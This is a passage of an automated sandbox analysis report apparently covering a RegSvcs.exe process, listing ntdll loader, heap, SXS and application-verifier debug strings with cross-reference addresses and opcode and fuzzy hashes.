                                                                                                              control_flow_graph 301 15d2c0a-15d2c0f 302 15d2c1f-15d2c26 LdrInitializeThunk 301->302 303 15d2c11-15d2c18 301->303
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 1949cef9742fc98c6a8476f2eb4c5e89e3a55229c98486c4f0ad34eba3bdb5e8
                                                                                                              • Instruction ID: dd5498e994d33f10a70b297bf6bc3704806a627ca2b025b84a5387940168edff
                                                                                                              • Opcode Fuzzy Hash: 1949cef9742fc98c6a8476f2eb4c5e89e3a55229c98486c4f0ad34eba3bdb5e8
                                                                                                              • Instruction Fuzzy Hash: 0EB09B71D025C5D5DA16E764460C71B794077D0711F19C461D2030A42F4778C5D1E375
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2160512332
                                                                                                              • Opcode ID: 753cf0473531ffbebf807b5f258825d112e43e3b1894a6fa2dab422dd1fe2bca
                                                                                                              • Instruction ID: 06b2a617b03c5080b7b7583baf575935f9110f62788112b56b5754a1c5cf9f25
                                                                                                              • Opcode Fuzzy Hash: 753cf0473531ffbebf807b5f258825d112e43e3b1894a6fa2dab422dd1fe2bca
                                                                                                              • Instruction Fuzzy Hash: 10929A71604342AFE721CE28CC90B6BB7E9BB84714F28492DFA95DB354D770E844CB92
                                                                                                              Strings
                                                                                                              • 8, xrefs: 016052E3
                                                                                                              • Critical section debug info address, xrefs: 0160541F, 0160552E
                                                                                                              • Address of the debug info found in the active list., xrefs: 016054AE, 016054FA
                                                                                                              • Invalid debug info address of this critical section, xrefs: 016054B6
                                                                                                              • undeleted critical section in freed memory, xrefs: 0160542B
                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01605543
                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0160540A, 01605496, 01605519
                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016054E2
                                                                                                              • Critical section address, xrefs: 01605425, 016054BC, 01605534
                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016054CE
                                                                                                              • double initialized or corrupted critical section, xrefs: 01605508
                                                                                                              • Thread identifier, xrefs: 0160553A
                                                                                                              • corrupted critical section, xrefs: 016054C2
                                                                                                              • Critical section address., xrefs: 01605502
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                              • API String ID: 0-2368682639
                                                                                                              • Opcode ID: 3b70742a387fda5c4bbd6a03b38d6d0336959543e73da586f49a154c12b9a070
                                                                                                              • Instruction ID: 75fe547f71fddd1670b9ba8b3e9d4e6b13011bda2b096ad9f998424988c7758b
                                                                                                              • Opcode Fuzzy Hash: 3b70742a387fda5c4bbd6a03b38d6d0336959543e73da586f49a154c12b9a070
                                                                                                              • Instruction Fuzzy Hash: 02817AB1A41349AFEB25CF99CC45BAEBBB5FB48B14F104119E505BB280D3B1A941CBA0
                                                                                                              Strings
                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016022E4
                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01602506
                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01602624
                                                                                                              • @, xrefs: 0160259B
                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01602409
                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0160261F
                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01602412
                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01602498
                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016024C0
                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016025EB
                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01602602
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                              • API String ID: 0-4009184096
                                                                                                              • Opcode ID: 1b653e6362ea8df0b8668b534cf8f50968fe2b4b0fe7d3294d6cc8fb0e9b2b4a
                                                                                                              • Instruction ID: 3176527dc945a18ccef7d677beeacc02393115b914cb7bf5f62102f57b02aab3
                                                                                                              • Opcode Fuzzy Hash: 1b653e6362ea8df0b8668b534cf8f50968fe2b4b0fe7d3294d6cc8fb0e9b2b4a
                                                                                                              • Instruction Fuzzy Hash: DB025EB1D002299FDB25DF54CC94BDAB7B8BF54704F0441EEA609AB281EB709E84CF59
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                              • API String ID: 0-2515994595
                                                                                                              • Opcode ID: 051d0a5bfa22310cde095405b79f5a7b1fd9be0fe005d23fdda80f0b0717538c
                                                                                                              • Instruction ID: c4d36d7c45579d865188b1984fcbfec690d3b9ce9e715fc415b40681771995d4
                                                                                                              • Opcode Fuzzy Hash: 051d0a5bfa22310cde095405b79f5a7b1fd9be0fe005d23fdda80f0b0717538c
                                                                                                              • Instruction Fuzzy Hash: D3519B725143029BD329CF288C48BABBBECFFD8654F144A1DB99987241E770DA05CBD2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              • API String ID: 0-1700792311
                                                                                                              • Opcode ID: 2858f580c102991b266aff57c73279242d6be801eb10ec390c75c9ba6ca1f4eb
                                                                                                              • Instruction ID: 51857c86373650716a5f2e9ce594073e2f0d8e756a59441848fc7a6e06378613
                                                                                                              • Opcode Fuzzy Hash: 2858f580c102991b266aff57c73279242d6be801eb10ec390c75c9ba6ca1f4eb
                                                                                                              • Instruction Fuzzy Hash: FED1CE316006A6EFDB26EF68C840AEDBBF6FF49610F088149F646AB752C734D941CB54
                                                                                                              Strings
                                                                                                              • VerifierFlags, xrefs: 01618C50
                                                                                                              • VerifierDlls, xrefs: 01618CBD
                                                                                                              • HandleTraces, xrefs: 01618C8F
                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01618A67
                                                                                                              • VerifierDebug, xrefs: 01618CA5
                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01618B8F
                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01618A3D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                              • API String ID: 0-3223716464
                                                                                                              • Opcode ID: 93dcb463bfad54ac9a9202e3e325b02f89dabf770aaf36d6f8b7f7514b46904f
                                                                                                              • Instruction ID: e9dccd21a847dc7a377d57cd14286cbec616c7189ea0cb285213ae8d03255a22
                                                                                                              • Opcode Fuzzy Hash: 93dcb463bfad54ac9a9202e3e325b02f89dabf770aaf36d6f8b7f7514b46904f
                                                                                                              • Instruction Fuzzy Hash: D8912672A41702AFD721EF68CC90B6A7BA9FB94B14F48465CFA42AF258C7709C01C795
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              • API String ID: 0-1109411897
                                                                                                              • Opcode ID: b6c04525dc527ddacb9bd6850d4a4b6f56e0c1760f2a4fb01d2edc78f611a4ca
                                                                                                              • Instruction ID: fe22e31b174e97f1e31f88c4ab10505159ae4bcaa453011ec58da2c3cc7beceb
                                                                                                              • Opcode Fuzzy Hash: b6c04525dc527ddacb9bd6850d4a4b6f56e0c1760f2a4fb01d2edc78f611a4ca
                                                                                                              • Instruction Fuzzy Hash: F1A22874A0562A8FDF64DF18CD887AEBBB5BF45304F1442EAD909AB250DB309E81CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-792281065
                                                                                                              • Opcode ID: f245f494a02bca524fe77893276ac52501f76e8bb1a83fc3b95ccd5db6190aeb
                                                                                                              • Instruction ID: 8d7b75a5455382d253eeee169b85ae14ca31f506f6abc449003d19a3ccca0948
                                                                                                              • Opcode Fuzzy Hash: f245f494a02bca524fe77893276ac52501f76e8bb1a83fc3b95ccd5db6190aeb
                                                                                                              • Instruction Fuzzy Hash: AB910470B00316AFDB3AAF98DC85BAEBBA1BB50B14F14425CDA016F3C1DBB09901C795
                                                                                                              Strings
                                                                                                              • apphelp.dll, xrefs: 01586496
                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015E9A2A
                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015E99ED
                                                                                                              • LdrpInitShimEngine, xrefs: 015E99F4, 015E9A07, 015E9A30
                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015E9A01
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015E9A11, 015E9A3A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-204845295
                                                                                                              • Opcode ID: a37f06510924a8efeb538797d6b22ce4951c78bc6b2f2f5ef81dfaa21e9e8bcc
                                                                                                              • Instruction ID: 2bfbd30a55d350deee2651dfdb88b91695c808962cc42f16e638eca6fe15ca9a
                                                                                                              • Opcode Fuzzy Hash: a37f06510924a8efeb538797d6b22ce4951c78bc6b2f2f5ef81dfaa21e9e8bcc
                                                                                                              • Instruction Fuzzy Hash: 42519F71608305AFE725EF24DC45AAFB7E9FF84648F40091DE585AF260D670E944CB92
                                                                                                              Strings
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01602180
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01602165
                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01602160, 0160219A, 016021BA
                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0160219F
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016021BF
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01602178
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                              • API String ID: 0-861424205
                                                                                                              • Opcode ID: 5f7d298cc6879ba6215782a751ddbef87187aa54e27673b32b968262ac74a0e1
                                                                                                              • Instruction ID: 70479e687f8b0c9c1813c5039002a8e0156343971cae9615e4fc9599cd2eb385
                                                                                                              • Opcode Fuzzy Hash: 5f7d298cc6879ba6215782a751ddbef87187aa54e27673b32b968262ac74a0e1
                                                                                                              • Instruction Fuzzy Hash: E2312A36A40211BBE7128ED5DC89F5B7AB9FF54E40F0540ADBB04AF240D7709A01C6A0
                                                                                                              Strings
                                                                                                              • LdrpInitializeProcess, xrefs: 015CC6C4
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01608181, 016081F5
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01608170
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 016081E5
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01608177, 016081EB
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015CC6C3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-475462383
                                                                                                              • Opcode ID: 4f682fe3b71dd6b4a0964c23e6a281e4525570f7090ffb8a92bdefa3468cb999
                                                                                                              • Instruction ID: 3d1c9ef19e16245658153fdffde39ee118036a789d2028541097d6384ddfd47a
                                                                                                              • Opcode Fuzzy Hash: 4f682fe3b71dd6b4a0964c23e6a281e4525570f7090ffb8a92bdefa3468cb999
                                                                                                              • Instruction Fuzzy Hash: AD31E071644712AFC324EF68DD86E2B7795BFD4B24F040A6CF944AF291E660EC04C7A2
                                                                                                              APIs
                                                                                                                • Part of subcall function 015D2DF0: LdrInitializeThunk.NTDLL ref: 015D2DFA
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0BA3
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0BB6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0D60
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0D74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404860816-0
                                                                                                              • Opcode ID: aa6f3a84fe3c172d5602b9f941ba37ccbd71a9cdf6e35f1e8d180a067a86d194
                                                                                                              • Instruction ID: a29bbe668b590112b164c4d164c9a55b92ebfc049cd5c5fac63f90de54a538d1
                                                                                                              • Opcode Fuzzy Hash: aa6f3a84fe3c172d5602b9f941ba37ccbd71a9cdf6e35f1e8d180a067a86d194
                                                                                                              • Instruction Fuzzy Hash: B6425A71900716DFDB25CF28C880BAAB7F5FF44314F1445AAE9899B282D770AA85CF60
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              • API String ID: 0-379654539
                                                                                                              • Opcode ID: 03c042d9c5b7bd2ce449d04f7dac8e5aca71056ab94c28616d3ec1260575cbc0
                                                                                                              • Instruction ID: 0abf4257855c6b09729cf8ba5588c97204a98bfbd12837d044a299474b48c4a8
                                                                                                              • Opcode Fuzzy Hash: 03c042d9c5b7bd2ce449d04f7dac8e5aca71056ab94c28616d3ec1260575cbc0
                                                                                                              • Instruction Fuzzy Hash: 15C169746083829FDB21CF58C144B6AB7E4BF85704F04896EFA998F251E774C949CBA3
                                                                                                              Strings
                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015C855E
                                                                                                              • @, xrefs: 015C8591
                                                                                                              • LdrpInitializeProcess, xrefs: 015C8422
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015C8421
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1918872054
                                                                                                              • Opcode ID: 5bc1626fe3f95e0182ae6513468e3acee36b9b545cc619e6f70ea5a5260ede53
                                                                                                              • Instruction ID: 574bf112b7c7dfdc0caf7b82bf0e21cf7bfc036c6e7f3c8f17e0396f7fc9a3d6
                                                                                                              • Opcode Fuzzy Hash: 5bc1626fe3f95e0182ae6513468e3acee36b9b545cc619e6f70ea5a5260ede53
                                                                                                              • Instruction Fuzzy Hash: CD919E71508346AFE722DF65CC80EAFBAECBF94B44F40092EF6859A150E374D904CB62
                                                                                                              Strings
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016021D9, 016022B1
                                                                                                              • .Local, xrefs: 015C28D8
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 016021DE
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016022B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                              • API String ID: 0-1239276146
                                                                                                              • Opcode ID: 8b880e59180ea33041531c06fe0db1aba83dcee4d45dc169be3732775f29fda2
                                                                                                              • Instruction ID: 3f1facf24e6b014fa1ac4847276c1a8a2c62660d1c7d8a43c2725902871a29d5
                                                                                                              • Opcode Fuzzy Hash: 8b880e59180ea33041531c06fe0db1aba83dcee4d45dc169be3732775f29fda2
                                                                                                              • Instruction Fuzzy Hash: B5A19C3190022A9FDB25CFA8DC88BAAB7B1BF58754F1545EDD908AB251D7709EC0CF90
                                                                                                              Strings
                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01603437
                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0160342A
                                                                                                              • RtlDeactivateActivationContext, xrefs: 01603425, 01603432, 01603451
                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01603456
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                              • API String ID: 0-1245972979
                                                                                                              • Opcode ID: 94ff738cc87528d263f23eda47e04817e6ce60aa153da2626b8b13524d822215
                                                                                                              • Instruction ID: 29582c4a6ebe4e29e90d9f54958dde9cc1adaec5983934b099d3a2d4be2d916b
                                                                                                              • Opcode Fuzzy Hash: 94ff738cc87528d263f23eda47e04817e6ce60aa153da2626b8b13524d822215
                                                                                                              • Instruction Fuzzy Hash: E961FD366416129FDB278E5CCC92F2AB7E1FF80B11F15852DE8559F390DB30E8018B91
                                                                                                              Strings
                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015F1028
                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015F106B
                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015F10AE
                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015F0FE5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                              • API String ID: 0-1468400865
                                                                                                              • Opcode ID: f28d942f4e6dbe5e16af3f7a432539ec323f5cadff884569fa65f8b61c4fc9f5
                                                                                                              • Instruction ID: 5c912b82d0b8419f707fbc1472d3fa86f8d0bd59909ea2bac73b5a626e0fca50
                                                                                                              • Opcode Fuzzy Hash: f28d942f4e6dbe5e16af3f7a432539ec323f5cadff884569fa65f8b61c4fc9f5
                                                                                                              • Instruction Fuzzy Hash: 7071B0B19043069FCB21DF18C885B9B7BA9BF95764F844868F9488F186D734D588CBD2
                                                                                                              Strings
                                                                                                              • LdrpDynamicShimModule, xrefs: 015FA998
                                                                                                              • apphelp.dll, xrefs: 015B2462
                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015FA992
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015FA9A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-176724104
                                                                                                              • Opcode ID: 5c3a6290bf378068f2d59e38b0228a5f0b391ca9d5d2c43fe40c85d5be26c211
                                                                                                              • Instruction ID: 5737df50f2a51b5261ae8b8c303ff5f631d19a748b2858119d04fcf500f8d061
                                                                                                              • Opcode Fuzzy Hash: 5c3a6290bf378068f2d59e38b0228a5f0b391ca9d5d2c43fe40c85d5be26c211
                                                                                                              • Instruction Fuzzy Hash: B8314671610202BBDB31AF59DD81EAE7BB4FB80B00F16012DEA056F345C7B0A851C791
                                                                                                              Strings
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015A327D
                                                                                                              • HEAP: , xrefs: 015A3264
                                                                                                              • HEAP[%wZ]: , xrefs: 015A3255
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
